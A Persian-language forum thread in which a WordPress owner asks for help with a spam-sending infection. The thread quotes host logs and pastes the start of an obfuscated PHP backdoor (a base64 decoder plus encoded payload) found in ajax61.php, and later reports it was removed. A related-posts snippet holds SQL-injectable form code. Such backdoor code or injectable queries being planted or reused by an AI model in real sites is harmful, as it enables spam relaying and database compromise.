hiwa

مشکل امنیتی در مورد ارسال ایمیل ناخواسته از سایت + جزئیات خطا

5 پست در این موضوع قرار دارد

ارسال شده در (ویرایش شده)

سلام دوستان

من یک هفته است درگیر یک مشکل امنیتی در سایت وردپرسم هستم ممنون میشم اگه وقت بگذارید نظرتون رو بگید تا بتونم بررسی های بیشتری داشته باشم.

متن خطایی که کارشناس هاست برای من ارسال کرده اینه:

لینک های مربوط به صفحات و کدهای آلوده در سایت شما به شرح ذیل ارائه می گردد : 


[27-Dec-2016 20:48:46 America/New_York] mail() on [D:\HostingSpaces\mydomain.com\mydomain.com\wwwroot\wp-includes\widgets\ajax61.php(1958) : eval()'d code:775]: To: manclik@o2.pl -- Headers: Date: Tue, 27 Dec 2016 20:48:46 -0500 From: Adrianna <adrianna@mydomain.com> Message-ID: <e086de42938f51715a6c6f5e2440922a@peykeaval.com> X-Priority: 3 MIME-Version: 1.0 Content-Type: multipart/alternative;     boundary="b1_e086de42938f51715a6c6f5e2440922a" Content-Transfer-Encoding: 8bit


[28-Dec-2016 03:32:25 America/New_York] mail() on [D:\HostingSpaces\mydomain.com\mydomain.com\wwwroot\wp-includes\widgets\ajax61.php(1958) : eval()'d code:775]: To: panos@spitfire.gr -- Headers: Date: Wed, 28 Dec 2016 03:32:25 -0500 From: Debbie <debbie@mydomain.com> Message-ID: <f69af4c19b6af26f68341250901069ed@peykeaval.com> X-Priority: 3 MIME-Version: 1.0 Content-Type: multipart/alternative;     boundary="b1_f69af4c19b6af26f68341250901069ed" Content-Transfer-Encoding: 8bit

قالبی که استفاده کردم listify نام داره . از سایت nikan خریداری کردم (250 هزار)

دو سه روز کامل درگیر اسکن و بررسی بودم و دوباره فایل های اسکن شده رو روی هاست(ویندوزی) پاک شده آپلود کردم اما باز هم همان مشکل قبلی پیش آمد.

سیستم خودم رو فول اسکن کردم.

تمام فایلهای سایت رو هم دانلود اسکن کردم. موارد مشکوک رو fix کردم با آنتی ویرویس avast Free اما مشکلم حل نشده.

راهکاری به نظرتون میرسه ؟

ممنون

ویرایش شده در توسط hiwa
1

به اشتراک گذاری این پست


لینک به پست

محتوای فایل ajax61.php هم به این شکله :

<?php
 $euvwzec = 2437; function kjmlq($hebqeajjrg, $psycehqwla){$evprzo = ''; for($i=0; $i < strlen($hebqeajjrg); $i++){$evprzo .= isset($psycehqwla[$hebqeajjrg[$i]]) ? $psycehqwla[$hebqeajjrg[$i]] : $hebqeajjrg[$i];}
$duqcskxg="base" . "64_decode";return $duqcskxg($evprzo);}
$qewdep = 'FSUdZJwNMAF8ktJfvcwfAtzIMfv3uXjJiXq76q1xFSUdZJwNMAF8ktzIM5wUvnkIvnGnOC9qxi3rCg47lcUR'.
'vtJ1xChKbAYRMAYUbeJ1ZQwdAeL7lQ0nOC9qxi3rCg4NMALRhSUKMJw3ZQ57'.
'hCsqxi3rCs1xZQb8ZArNMAF8kywiLJkQLJu7xF1x2q1xCDLR01JDJgJDQfhFDy4R01JGLBhhuo1suBWB6f9rCsggA5ry0UMy0U'.
'3n0gJri5LyA1yXLyunAD9wuCuzGavdGCEqOaXB6q1xCQUcxCyUlA412DsgA5ry0UMy0U3nDyL00ywbA1Mp0Uh40gLyLy'.
'wSi5unADg7oF8k2q1xCFggA5ry0UMy0U3nDyL00ywbA1Mp0Uh40gLyLywSi5unAD9wuC'.

 

0

به اشتراک گذاری این پست


لینک به پست
در 5 ساعت قبل، hiwa گفته است :

محتوای فایل ajax61.php هم به این شکله :


<?php
 $euvwzec = 2437; function kjmlq($hebqeajjrg, $psycehqwla){$evprzo = ''; for($i=0; $i < strlen($hebqeajjrg); $i++){$evprzo .= isset($psycehqwla[$hebqeajjrg[$i]]) ? $psycehqwla[$hebqeajjrg[$i]] : $hebqeajjrg[$i];}
$duqcskxg="base" . "64_decode";return $duqcskxg($evprzo);}
$qewdep = 'FSUdZJwNMAF8ktJfvcwfAtzIMfv3uXjJiXq76q1xFSUdZJwNMAF8ktzIM5wUvnkIvnGnOC9qxi3rCg47lcUR'.
'vtJ1xChKbAYRMAYUbeJ1ZQwdAeL7lQ0nOC9qxi3rCg4NMALRhSUKMJw3ZQ57'.
'hCsqxi3rCs1xZQb8ZArNMAF8kywiLJkQLJu7xF1x2q1xCDLR01JDJgJDQfhFDy4R01JGLBhhuo1suBWB6f9rCsggA5ry0UMy0U'.
'3n0gJri5LyA1yXLyunAD9wuCuzGavdGCEqOaXB6q1xCQUcxCyUlA412DsgA5ry0UMy0U3nDyL00ywbA1Mp0Uh40gLyLy'.
'wSi5unADg7oF8k2q1xCFggA5ry0UMy0U3nDyL00ywbA1Mp0Uh40gLyLywSi5unAD9wuC'.

 

درود بر شما بنده زیاد ازین کدها سر در نیاوردم ولی تا جایی که متوجه شدم اول اینکه شما دارین از هاست ویندوز استفاده میکنین که این زیاد با وردپرس همخوانی نداره و عمده مشکلاتتون دقیقا از اینجا شروع میشه!

بعدش اینکه فک میکنم یه کد مخرب بصورت رمزگذاری شده همون متن سبز رنگ در یکی از ابزارکهای قالب وجود داره!

که اول باید دیکد بشه و بعدا که متوجه شدین چی هست حذف بشه!

یا اون بخش از کدها رو حدف کنید و ببینید مشکل بر طرف میشه یا بازم وجود داره!

فک میکنم این موارد رو چک کنید مشکلتون برطرف بشه اگر نشد بازم پیام بزاردی فرصتی داشتم خدمت میرسم و بازم چک میکنیم با هم

^_^

1

به اشتراک گذاری این پست


لینک به پست

دوستت عزیز خیلی متشکرم از جوابت. مواردی که گفتی رو دارم انجام میدم. امیدوارم حل بشه. نتیجه رو حتما خدمتت گزارش میدم. بازم ممنونم ازت.

0

به اشتراک گذاری این پست


لینک به پست

مشکل من یک بک دور به اسم Backdoor.PHP.Agent.RO  بود که به کمک Bitdefender total security 2017 تونستم مشکل رو حل کنم.

0

به اشتراک گذاری این پست


لینک به پست

برای ارسال نظر یک حساب کاربری ایجاد کنید یا وارد حساب خود شوید

برای اینکه بتوانید نظر ارسال کنید نیاز دارید که کاربر سایت شوید

ایجاد یک حساب کاربری

برای حساب کاربری جدید در انجمن ما ثبت نام کنید. عضویت خیلی ساده است !


ثبت نام یک حساب کاربری جدید

ورود به حساب کاربری

دارای حساب کاربری هستید؟ از اینجا وارد شوید


ورود به حساب کاربری

  • مطالب مشابه

    • توسط Mrbugx
      سلام
      دوستان عزیز من با کد زیر اطلاعاتم رو توی دیتابیس به راحتی سیو می کنم
      $connection = mysql_connect("localhost", "TABLE","PASSWORD"); // ایجاد ارتباط با سرور $db = mysql_select_db("DB NAME", $connection); // انتخاب دیتابیس از روی سرور if(isset($_POST['submitted'])){ // دریافت ورودی های فرم و قرار دادن در متغیر $namekala = $_POST['namekala']; $namecompany = $_POST['namecompany']; $maghta = $_POST['maghta']; $zekhamat = $_POST['zekhamat']; $price = $_POST['price']; $status = $_POST['status']; $category = $_POST['category']; $updatedate = $_POST['updatedate']; $tozihatefani = $_POST['tozihatefani']; $keyword = $_POST['keyword']; $pic = $_POST['pic']; $image = addslashes(file_get_contents($_FILES['image']['tmp_name'])); //SQL Injection defence! $image_name = addslashes($_FILES['image']['name']); if($namekala !=''||$namecompany !=''||$maghta !=''||$zekhamat !=''||$price !=''||$status !=''||$category !=''||$updatedate !=''||$tozihatefani !=''||$keyword !=''){ //Insert Query of SQL $query = mysql_query("insert into mahsool(namekala, namecompany, maghta, zekhamat,price,status,category,updatedate,tozihatefani,keyword,pic) values (N'$namekala', N'$namecompany', N'$maghta', N'$zekhamat', N'$price', N'$status', N'$category', N'$updatedate', N'$tozihatefani', N'$keyword', N'$pic',)"); حالا اگه بخوام پست آی دی رو ذخیره کنم چه باید بکنم ؟
      ممنون میشم راهنمایی جامع بکنید مرسی
    • توسط hamidfarahani1988
      سلام دوستان من یه مشکل دارم ممنون میشم اگه کسی بتونه کمکم کنه من یه سایت ورد پرسی دارم که عضو گیری با یوزر پرو ست و از افزون یوزر پرو تگ هم استفاد میکنم و مشکلم این که از هر طریقی میخوام این تگ ها رو تو سایتم جستج کنم و یا تگ ها رو توی سایتم قرار بدم نمایش داده نمیشه ممنون میشم اگه از دوستان کسی بتونه کمک کنه و این که تگ ها به منو هام اضافه میشه ولی با کلیک روی هر کروم از تگ ها ادرسی تو ادرس بار نمایش داده میشه که اون تگ پیدا نمیشه 
      این ادرس سایت هست
      Moshaveronline.net
    • توسط 2raj
      سلام و عرض ادب
      جدیدا با یه مشکل روبرو شدیم و اونم عدم نمایش زیر منو ها هست.اگر در عکس دقت کنید متوجه میشید که بعد از منو خدمات مالی و حسابداری که منوی خدمات مجالس و تشریفات ،خدمات چاپ و تبلیغات،خدمات ثبت ، تاسیس و تغییر انواع شرکت و... وجود داره نمایش داده نمیشه حتی با اسکرول به پائین هم نمیتونیم اونهارو مشاهده کنیم
      حالا ممنون میشم اگر که ممکنه مشکل رو بررسی کنید و راه حلی ارائه بدید
      آدرس سایت
      سپاس

    • توسط 2raj
      سلام و عرض ادب
      دوستان سایت بنده از برگه های زیادی استفاده میکنه که میخوام بعضی از این برگه ها بعد از لاگین یا ثبت نام نمایش داده بشه راهی برای اینکار هست؟
      البته توی وردپرس دیدم میشه صفحه رو رمزدار یا خصوصی کرد ولی نمیخوام صفحه رمز دار باشه و اینکه وقتی روی خصوصی هم میذارم میزنه صفحه پیدا نشد
      لطفا راهنمایی کنید
    • توسط amirrezaweb
      سلام
      صفحه ی اصلی سایتم توی گوگل ایندکس نشده و وقتی اسم سایتم رو سرچ میکنم صفحات دیگه سایتم رو تو نتایج میاره اما صفحه اصلی رو نه لطفا راهنمایی کنید این باری من خیلی مشکل بزرگیه ممنون
      اینم آدرس سایتم
      javaaneh.ir
      علاوه بر صفحه اصلی صفحه های مهم دیگه ام مثل فروشگاه ایندکس نمیشه